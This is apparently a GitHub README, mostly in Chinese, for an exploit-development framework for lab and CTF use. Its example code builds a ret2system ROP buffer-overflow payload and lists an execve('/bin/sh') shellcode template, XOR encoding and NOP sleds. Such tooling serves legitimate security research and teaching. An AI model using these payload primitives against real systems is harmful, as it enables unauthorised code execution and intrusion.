NullAILab/nullai-exploit-dev-framework

GitHub: NullAILab/nullai-exploit-dev-framework

模块化的漏洞利用开发工具包，提供循环模式生成、ROP gadget 查找、shellcode 编码和 payload 构建等核心原语，帮助安全研究人员在受控环境中高效编写 PoC 漏洞利用程序。

Stars: 0 | Forks: 0

# 漏洞利用开发框架 ![Python](https://img.shields.io/badge/Python-3.10+-3776AB?logo=python&logoColor=white) ![测试](https://img.shields.io/badge/Tests-62%20passing-brightgreen) ![许可证](https://img.shields.io/badge/License-MIT-green) 模块化漏洞利用开发工具包 —— 循环模式生成、ROP gadget 查找器、shellcode 编码器和 payload 构建器。提供了在受控实验室环境中编写概念验证（PoC）漏洞利用程序所需的所有原语。 ## 示例 ``` from src import cyclic, cyclic_find, p64, PayloadBuilder, find_gadgets, ROPChain # 1. 查找 crash offset pattern = cyclic(200) # 发送 pattern 到目标，crashes at EIP = 0x6161616d offset = cyclic_find(0x6161616d) # 44 # 2. 查找 ROP gadgets with open("vuln", "rb") as f: binary = f.read() rop = ROPChain(find_gadgets(binary, base_address=0x400000)) # 3. 构建 payload payload = ( PayloadBuilder() .pad(offset) .addr64(rop.find("pop rdi ; ret")) .addr64(0x601060) # "/bin/sh" .addr64(0x400550) # system() .build() ) ``` ## 模块 | 模块 | 功能说明 | |--------|-------------| | `pattern` | 循环 De Bruijn 模式 + 偏移量查找器 | | `packing` | `p8/p16/p32/p64`, `u32/u64`, `flat()` | | `shellcode` | XOR 编码器，坏字符查找器，NOP sled，shellcode 模板 | | `rop` | ROP gadget 扫描器 + `ROPChain` 构建器 | | `payload` | `BufferOverflowPayload`, `FormatStringPayload`, `PayloadBuilder` | ## 快速参考 ``` # Patterns cyclic(200) # b'aaaabaaacaaad...' cyclic_find(0x6161616d) # 44 # Packing p32(0xdeadbeef) # b'\xef\xbe\xad\xde' p64(0x4141414141414141) # b'AAAAAAAA' flat(0xdeadbeef, b"\x90\x90") # mixed bytes + ints # Shellcode xor_encode(shellcode, key=0x42) # remove null bytes nop_sled(16) # b'\x90' * 16 EXECVE_BIN_SH_64 # ready execve shellcode # ROP gadgets = find_gadgets(binary, base_address=0x400000) rop = ROPChain(gadgets) rop.find("pop rdi ; ret") # packed address bytes rop.search("pop") # list of matching gadgets # Payload PayloadBuilder().pad(112).addr64(pop_rdi).addr64(sh).addr64(system).build() ``` ## 用法 ``` pip install -r requirements.txt python -m src cyclic 200 python -m src cyclic-find 0x6161616d python -m src gadgets ./binary python -m src shellcode ``` ## 项目结构 ``` src/ ├── pattern.py cyclic pattern + cyclic_find ├── packing.py p32/p64/u32/u64/flat ├── shellcode.py XOR encoder, bad chars, NOP sled, templates ├── rop.py gadget scanner + ROPChain ├── payload.py BufferOverflow, FormatString, PayloadBuilder └── __main__.py CLI tests/ └── test_exploit_framework.py 62 tests ``` ## 测试 ``` pytest tests/ -v ``` ## 参考 - [pwntools](https://github.com/Gallopsled/pwntools) - [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) - [exploit.education](https://exploit.education/) ## 许可证 MIT

标签：CTF安全工具, CTF工具, De Bruijn序列, Maven, Payload生成, PWN, Python安全工具, ROP链, Shellcode编写, 二进制分析, 云安全运维, 坏字符过滤, 堆栈溢出, 安全规则引擎, 格式化字符串漏洞, 漏洞利用开发, 漏洞搜索, 漏洞验证, 红队武器库, 网络安全, 网络安全实验, 隐私保护